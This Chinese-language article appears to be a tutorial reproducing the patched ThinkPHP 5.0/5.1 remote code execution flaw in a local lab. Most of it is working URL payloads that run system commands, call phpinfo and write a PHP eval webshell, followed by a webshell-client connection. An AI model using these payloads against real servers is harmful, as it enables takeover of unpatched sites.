主页 > 知识库 > ThinkPHP 5.x远程命令执行漏洞复现

ThinkPHP 5.x远程命令执行漏洞复现

热门标签:德阳中江如何申请400开头电话 办理重庆400电话 智能电话机器人好公司门萨维 沛县400电话办理 江苏电商外呼系统运营商 AI电话机器人OEM贴牌 铜川电话机器人价格 聊城电话外呼系统公司 青白江地图标注

一、漏洞描述

2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞:

https://blog.thinkphp.cn/869075 

漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。

二、漏洞影响版本

Thinkphp 5.x-Thinkphp 5.1.31

Thinkphp 5.0.x=5.0.23

三、漏洞复现

1、官网下载Thinkphp 5.0.22,下载地址: http://www.thinkphp.cn/donate/download/id/1260.html

2、使用phpstudy搭建环境,解压下载的Thinkphp5.0.22到网站目录下,浏览器访问http://192.168.10.171/thinkphp5.0.22/public

  

3、利用system函数远程命令执行

Payload如下:

?s=index/think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=whoami

  

4、通过phpinfo函数查看phpinfo()的信息 

Payload如下:

?s=index/think\app/invokefunctionfunction=call_user_func_arrayvars[0]=phpinfovars[1][]=1

  

5、写入shell

Payload如下:

?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=echo ^?php @eval($_POST[cmd]);?^> >shell.php

注意:需要对特殊字符使用^转义(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url编码不编码都行。

  

6、查看是否成功写入shell

  

7、菜刀连接

  

8、第二种的写入shell的方法

Payload如下:

?s=index/think\app/invokefunctionfunction=call_user_func_arrayvars[0]=file_put_contentsvars[1][]=../test.phpvars[1][]=?php @eval($_POST[test]);?>

  

9、查看是否成功写入文件

  

10、菜刀连接

  

总结

以上所述是小编给大家介绍的ThinkPHP 5.x远程命令执行漏洞复现,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对脚本之家网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

您可能感兴趣的文章:
  • ThinkPHP框架任意代码执行漏洞的利用及其修复方法
  • 对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
  • ThinkPHP的标签制作实例讲解
  • thinkphp的钩子的两种配置和两种调用方法
  • phpstudy的安装及ThinkPHP框架的搭建图文讲解
  • ThinkPHP6.0 重写URL去掉Index.php的解决方法
  • ThinkPHP6通过Ucenter实现注册登录的示例代码
  • Thinkphp5+Redis实现商品秒杀代码实例讲解
  • 如何从防护角度看Thinkphp历史漏洞

标签:鹰潭 南宁 迪庆 三亚 乌鲁木齐 济宁 赤峰 山南

巨人网络通讯声明:本文标题《ThinkPHP 5.x远程命令执行漏洞复现》,本文关键词  ThinkPHP,5.x,远程,命令,执行,;如发现本文内容存在版权问题,烦请提供相关信息告之我们,我们将及时沟通与处理。本站内容系统采集于网络,涉及言论、版权与本站无关。
  • 相关文章
  • 下面列出与本文章《ThinkPHP 5.x远程命令执行漏洞复现》相关的同类信息!
  • 本页收集关于ThinkPHP 5.x远程命令执行漏洞复现的相关信息资讯供网民参考!
  • 推荐文章